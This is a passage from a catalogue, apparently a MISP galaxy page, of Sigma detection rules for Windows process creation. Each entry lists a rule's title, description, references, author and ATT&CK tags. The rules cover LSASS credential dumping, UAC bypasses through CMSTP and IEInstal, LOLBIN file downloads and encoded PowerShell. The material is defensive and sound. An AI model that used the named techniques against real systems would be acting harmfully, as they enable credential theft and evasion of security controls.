| logsource.product | windows |
| tags | ['attack.persistence', 'attack.initial-access', 'attack.t1133'] |
Related clusters
To see the related clusters, click here.
Renamed CreateDump Utility Execution
Detects use of a renamed legitimate createdump.exe LOLBIN utility to dump process memory
Internal MISP references
UUID 1a1ed54a-2ba4-4221-94d5-01dee560d71e which can be used as unique global reference for Renamed CreateDump Utility Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - webarchive
- https://twitter.com/bopin2020/status/1366400799199272960 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-09-20 |
| falsepositive | ['Command lines that use the same flags'] |
| filename | proc_creation_win_renamed_createdump.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access'] |
Related clusters
To see the related clusters, click here.
Potential Credential Dumping Via LSASS Process Clone
Detects a suspicious LSASS process clone that could be a sign of credential dumping activity
Internal MISP references
UUID c8da0dfd-4ed0-4b68-962d-13c9c884384e which can be used as unique global reference for Potential Credential Dumping Via LSASS Process Clone in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/SBousseaden/status/1464566846594691073?s=20 - webarchive
- https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ - webarchive
- https://twitter.com/Hexacorn/status/1420053502554951689 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Samir Bousseaden |
| creation_date | 2021-11-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lsass_process_clone.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003', 'attack.t1003.001'] |
Related clusters
To see the related clusters, click here.
CMSTP Execution Process Creation
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Internal MISP references
UUID 7d4cdc5a-0076-40ca-aac8-f7e714570e47 which can be used as unique global reference for CMSTP Execution Process Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nik Seetharaman |
| creation_date | 2018-07-16 |
| falsepositive | ['Legitimate CMSTP use (unlikely in modern enterprise environments)'] |
| filename | proc_creation_win_cmstp_execution_by_creation.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001'] |
Related clusters
To see the related clusters, click here.
Suspicious Recursive Takeown
Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant adversaries higher permissions on specific files and folders
Internal MISP references
UUID 554601fb-9b71-4bcc-abf4-21a611be4fde which can be used as unique global reference for Suspicious Recursive Takeown in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-30 |
| falsepositive | ['Scripts created by developers and admins', 'Administrative activity'] |
| filename | proc_creation_win_takeown_recursive_own.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1222.001'] |
Related clusters
To see the related clusters, click here.
Process Execution From A Potentially Suspicious Folder
Detects a potentially suspicious execution from an uncommon folder.
Internal MISP references
UUID 3dfd06d2-eaf4-4532-9555-68aca59f57c4 which can be used as unique global reference for Process Execution From A Potentially Suspicious Folder in MISP communities and other software using the MISP galaxy
External references
- https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md - webarchive
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - webarchive
- https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Tim Shelton |
| creation_date | 2019-01-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_execution_path.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
Execution Of Non-Existing File
Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
Internal MISP references
UUID 71158e3f-df67-472b-930e-7d287acaa3e1 which can be used as unique global reference for Execution Of Non-Existing File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Max Altgelt (Nextron Systems) |
| creation_date | 2021-12-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_image_missing.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
PowerShell Base64 Encoded WMI Classes
Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
Internal MISP references
UUID 1816994b-42e1-4fb1-afd2-134d88184f71 which can be used as unique global reference for PowerShell Base64 Encoded WMI Classes in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-30 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_base64_wmi_classes.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1027'] |
Related clusters
To see the related clusters, click here.
PUA - NirCmd Execution
Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
Internal MISP references
UUID 4e2ed651-1906-4a59-a78a-18220fca1b22 which can be used as unique global reference for PUA - NirCmd Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ - webarchive
- https://www.nirsoft.net/utils/nircmd.html - webarchive
- https://www.nirsoft.net/utils/nircmd2.html#using - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-24 |
| falsepositive | ['Legitimate use by administrators'] |
| filename | proc_creation_win_pua_nircmd.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002', 'attack.s0029'] |
Related clusters
To see the related clusters, click here.
Potentially Suspicious Call To Win32_NTEventlogFile Class
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
Internal MISP references
UUID caf201a9-c2ce-4a26-9c3a-2b9525413711 which can be used as unique global reference for Potentially Suspicious Call To Win32_NTEventlogFile Class in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-07-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_nteventlogfile_usage.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Operator Bloopers Cobalt Strike Modules
Detects Cobalt Strike modules/commands accidentally entered in a CMD shell
Internal MISP references
UUID 4f154fb6-27d1-4813-a759-78b93e0b9c48 which can be used as unique global reference for Operator Bloopers Cobalt Strike Modules in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ - webarchive
- https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf - webarchive
- https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | _pete_0, TheDFIRReport |
| creation_date | 2022-05-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.003'] |
Related clusters
To see the related clusters, click here.
Wab/Wabmig Unusual Parent Or Child Processes
Detects unusual parent or child processes of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes, as seen being used with Bumblebee activity
Internal MISP references
UUID 63d1ccc0-2a43-4f4b-9289-361b308991ff which can be used as unique global reference for Wab/Wabmig Unusual Parent Or Child Processes in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime - webarchive
- https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wab_unusual_parents.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution'] |
UAC Bypass Using Windows Media Player - Process
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Internal MISP references
UUID 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_wmp.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
Bypass UAC via CMSTP
Detects command-line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
Internal MISP references
UUID e66779cc-383e-4224-a3a4-267eeb585c40 which can be used as unique global reference for Bypass UAC via CMSTP in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Cmstp/ - webarchive
- https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community |
| creation_date | 2019-10-24 |
| falsepositive | ['Legitimate use of cmstp.exe utility by legitimate user'] |
| filename | proc_creation_win_uac_bypass_cmstp.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002', 'attack.t1218.003'] |
Related clusters
Dllhost.EXE Execution Anomaly
Detects a "dllhost" process spawning with no command-line arguments, which is very rare and could indicate process injection activity or malware mimicking similar system processes.
Internal MISP references
UUID e7888eb1-13b0-4616-bd99-4bc0c2b054b9 which can be used as unique global reference for Dllhost.EXE Execution Anomaly in MISP communities and other software using the MISP galaxy
External references
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf - webarchive
- https://redcanary.com/blog/child-processes/ - webarchive
- https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-27 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_dllhost_no_cli_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055'] |
Related clusters
Suspicious Command Patterns In Scheduled Task Creation
Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
Internal MISP references
UUID f2c64357-b1d2-41b7-849f-34d2682c0fad which can be used as unique global reference for Suspicious Command Patterns In Scheduled Task Creation in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/RedDrip7/status/1506480588827467785 - webarchive
- https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/ - webarchive
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-23 |
| falsepositive | ['Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives'] |
| filename | proc_creation_win_schtasks_susp_pattern.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053.005'] |
Related clusters
Execute Files with Msdeploy.exe
Detects file execution using the msdeploy.exe lolbin
Internal MISP references
UUID 646bc99f-6682-4b47-a73a-17b1b64c9d34 which can be used as unique global reference for Execute Files with Msdeploy.exe in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/pabraeken/status/995837734379032576 - webarchive
- https://twitter.com/pabraeken/status/999090532839313408 - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Beyu Denis, oscd.community |
| creation_date | 2020-10-18 |
| falsepositive | ['System administrator Usage'] |
| filename | proc_creation_win_lolbin_msdeploy.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
System Information Discovery via Registry Queries
Detects attempts to query system information directly from the Windows Registry.
Internal MISP references
UUID 0022869c-49f7-4ff2-ba03-85ac42ddac58 which can be used as unique global reference for System Information Discovery via Registry Queries in MISP communities and other software using the MISP galaxy
External references
- https://cert.gov.ua/article/6277849 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1082/T1082.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | lazarg |
| creation_date | 2025-06-12 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_discovery_via_reg_queries.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1082'] |
Related clusters
Recon Command Output Piped To Findstr.EXE
Detects the execution of a potential recon command whose output is piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via "/c" or "/k", for example. Attackers often use this technique to extract the specific information they require during their reconnaissance phase.
Internal MISP references
UUID ccb5742c-c248-4982-8c5c-5571b9275ad3 which can be used as unique global reference for Recon Command Output Piped To Findstr.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist - webarchive
- https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2023-07-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_findstr_recon_pipe_output.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1057'] |
Related clusters
Suspicious Child Process Of SQL Server
Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Internal MISP references
UUID 869b9ca7-9ea2-4a5a-8325-e80e62f75445 which can be used as unique global reference for Suspicious Child Process Of SQL Server in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | FPT.EagleEye Team, wagga |
| creation_date | 2020-12-11 |
| falsepositive | No established falsepositives |
| filename | proc_creation_win_mssql_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1505.003', 'attack.t1190', 'attack.initial-access', 'attack.persistence', 'attack.privilege-escalation'] |
Related clusters
Potential Suspicious Mofcomp Execution
Detects execution of the "mofcomp" utility as a child of a suspicious shell or script-running utility, or with a suspicious path in the command line. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts.
Internal MISP references
UUID 1dd05363-104e-4b4a-b963-196a534b03a1 which can be used as unique global reference for Potential Suspicious Mofcomp Execution in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp - webarchive
- https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - webarchive
- https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_mofcomp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
UAC Bypass Using IEInstal - Process
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Internal MISP references
UUID 80fc36aa-945e-4181-89f2-2f907ab6775d which can be used as unique global reference for UAC Bypass Using IEInstal - Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_ieinstal.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
Uncommon Child Process Of Appvlp.EXE
Detects uncommon child processes of Appvlp.EXE. Appvlp, the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
Internal MISP references
UUID 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 which can be used as unique global reference for Uncommon Child Process Of Appvlp.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sreeman |
| creation_date | 2020-03-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_appvlp_uncommon_child_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1218', 'attack.defense-evasion', 'attack.execution'] |
Related clusters
Suspicious Microsoft Office Child Process
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
Internal MISP references
UUID 438025f9-5856-4663-83f7-52f878a70a50 which can be used as unique global reference for Suspicious Microsoft Office Child Process in MISP communities and other software using the MISP galaxy
External references
- https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - webarchive
- https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e - webarchive
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A - webarchive
- https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html - webarchive
- https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set - webarchive
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml - webarchive
- https://github.com/splunk/security_content/blob/300af51b88ad5d5b27ce4f5f54e4d6e6a3a2c06d/detections/endpoint/office_spawning_control.yml - webarchive
- https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html - webarchive
- https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - webarchive
- https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io |
| creation_date | 2018-04-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_office_susp_child_processes.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010'] |
Related clusters
Cloudflared Tunnel Connections Cleanup
Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.
Internal MISP references
UUID 7050bba1-1aed-454e-8f73-3f46f09ce56a which can be used as unique global reference for Cloudflared Tunnel Connections Cleanup in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-17 |
| falsepositive | ['Legitimate usage of Cloudflared.'] |
| filename | proc_creation_win_cloudflared_tunnel_cleanup.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1102', 'attack.t1090', 'attack.t1572'] |
Related clusters
Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" to download arbitrary files
Internal MISP references
UUID 863218bd-c7d0-4c52-80cd-0a96c09f54af which can be used as unique global reference for Arbitrary File Download Via IMEWDBLD.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imewbdld_download.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel |
| creation_date | 2023-11-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_imewbdld_download.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218'] |
Related clusters
Potential Encoded PowerShell Patterns In CommandLine
Detects specific combinations of encoding methods in PowerShell via the commandline
Internal MISP references
UUID cdf05894-89e7-4ead-b2b0-0a5f97a90f2f which can be used as unique global reference for Potential Encoded PowerShell Patterns In CommandLine in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton |
| creation_date | 2020-10-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_encoding_patterns.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001'] |
Related clusters
Suspicious Msbuild Execution By Uncommon Parent Process
Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process
Internal MISP references
UUID 33be4333-2c6b-44f4-ae28-102cdbde0a31 which can be used as unique global reference for Suspicious Msbuild Execution By Uncommon Parent Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-11-17 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_msbuild_susp_parent_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
Detects the usage of emojis in the command line; this could be a sign of potential defense evasion activity.
Internal MISP references
UUID c98f2a0d-e1b8-4f76-90d3-359caf88d6b9 which can be used as unique global reference for Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @Kostastsale, TheDFIRReport |
| creation_date | 2022-12-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_emoji_usage_in_cli_2.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Indirect Inline Command Execution Via Bash.EXE
Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Internal MISP references
UUID 5edc2273-c26f-406c-83f3-f4d948e740dd which can be used as unique global reference for Indirect Inline Command Execution Via Bash.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-24 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_bash_command_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1202'] |
Related clusters
Suspicious Parent Double Extension File Execution
Detects execution of suspicious double-extension files in the ParentCommandLine
Internal MISP references
UUID 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c which can be used as unique global reference for Suspicious Parent Double Extension File Execution in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_double_extension_parent.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.007'] |
Related clusters
Setup16.EXE Execution With Custom .Lst File
Detects the execution of "Setup16.EXE", an old installation utility, with a custom ".lst" file. These ".lst" files can contain references to external programs that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living-off-the-land utility.
Internal MISP references
UUID 99c8be4f-3087-4f9f-9c24-8c7e257b442e which can be used as unique global reference for Setup16.EXE Execution With Custom .Lst File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2024-12-01 |
| falsepositive | ['On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.'] |
| filename | proc_creation_win_setup16_custom_lst_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.005'] |
Related clusters
Firewall Rule Update Via Netsh.EXE
Detects execution of netsh with the "advfirewall" and "set" options in order to set new values for properties of an existing rule
Internal MISP references
UUID a70dcb37-3bee-453a-99df-d0c683151be6 which can be used as unique global reference for Firewall Rule Update Via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
